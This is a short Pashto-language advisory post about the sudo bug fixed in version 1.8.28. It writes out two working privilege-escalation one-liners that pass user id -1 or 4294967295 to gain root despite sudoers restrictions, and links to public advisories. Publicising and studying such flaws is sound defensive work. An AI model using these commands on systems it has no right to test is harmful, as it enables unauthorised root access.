په سوډو کې زیانمنتیا

په sudo کې بګ تاسو ته اجازه درکوي چې د روټ په توګه د اجرا وړ فایل اجرا کړئ که /etc/sudoers اجازه ورکړي چې د نورو کاروونکو لخوا اجرا شي او د روټ لپاره منع وي.

د غلطۍ استخراج خورا ساده دی:

sudo -u#-1 id -u

یا:

sudo -u#4294967295 id -u

تېروتنه د 1.8.28 څخه دمخه د sudo په ټولو نسخو کې شتون لري

توضیحات:

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html

https://www.sudo.ws/alerts/minus_1_uid.html

سرچینه: linux.org.ru